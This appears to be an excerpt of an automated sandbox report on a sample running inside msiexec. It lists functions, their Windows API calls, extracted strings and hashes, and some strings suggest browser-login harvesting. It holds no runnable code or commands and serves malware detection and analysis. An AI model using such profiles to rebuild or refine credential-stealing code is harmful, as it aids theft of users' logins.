                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Dialog$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3975816621-0
                                                                                        • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                        • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                        • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                        • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                        Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 00444D09
                                                                                        • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                        • _wcsicmp.MSVCRT ref: 00444D33
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$wcslen$_memicmp
                                                                                        • String ID: .save$http://$https://$log profile$signIn
                                                                                        • API String ID: 1214746602-2708368587
                                                                                        • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                        • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                        • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                        • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                        Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                        • memset.MSVCRT ref: 00405E33
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                        • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2313361498-0
                                                                                        • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                        • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                        • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                        • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                        Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                        • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                        • GetWindow.USER32(00000000), ref: 00405F80
                                                                                          • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                        • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                        • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageRectSend$Client
                                                                                        • String ID:
                                                                                        • API String ID: 2047574939-0
                                                                                        • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                        • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                        • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                        • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                        Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                        • GetTickCount.KERNEL32 ref: 0041887D
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                        • String ID:
                                                                                        • API String ID: 4218492932-0
                                                                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                        Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: gj
                                                                                        • API String ID: 438689982-4203073231
                                                                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                        Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                        • API String ID: 3510742995-2446657581
                                                                                        • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                        • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                        • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                        • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                        Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                        • memset.MSVCRT ref: 00405ABB
                                                                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                        • SetFocus.USER32(?), ref: 00405B76
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                        • String ID:
                                                                                        • API String ID: 4281309102-0
                                                                                        • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                        • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                        • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                        • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                        Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintfwcscat
                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                        • API String ID: 384018552-4153097237
                                                                                        • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                        • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                        • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                        • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                        Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                        • String ID: 0$6
                                                                                        • API String ID: 2029023288-3849865405
                                                                                        • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                        • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                        Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                        • memset.MSVCRT ref: 00405455
                                                                                        • memset.MSVCRT ref: 0040546C
                                                                                        • memset.MSVCRT ref: 00405483
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$ErrorLast
                                                                                        • String ID: 6$\
                                                                                        • API String ID: 404372293-1284684873
                                                                                        • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                        • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                        Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesErrorFileLastSleep$free
                                                                                        • String ID:
                                                                                        • API String ID: 1470729244-0
                                                                                        • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                        • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                        Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1331804452-0
                                                                                        • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                        • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                        Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                        • String ID: advapi32.dll
                                                                                        • API String ID: 2012295524-4050573280
                                                                                        • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                        • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                        • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                        • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                        Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                        • <%s>, xrefs: 004100A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf
                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                        • API String ID: 3473751417-2880344631
                                                                                        • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                        • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                        Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                        • String ID: %2.2X
                                                                                        • API String ID: 2521778956-791839006
                                                                                        • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                        • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                        Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintfwcscpy
                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                        • API String ID: 999028693-502967061
                                                                                        • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                        • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                        Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 00408DFA
                                                                                          • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                        • memset.MSVCRT ref: 00408E46
                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2350177629-0
                                                                                        • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                        • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                        • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                        • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                        Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                        • API String ID: 2221118986-1606337402
                                                                                        • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                        • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                        • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                        • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                        Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                        • memset.MSVCRT ref: 00408FD4
                                                                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                        • memset.MSVCRT ref: 00409042
                                                                                        • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                          • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 265355444-0
                                                                                        • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                        • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
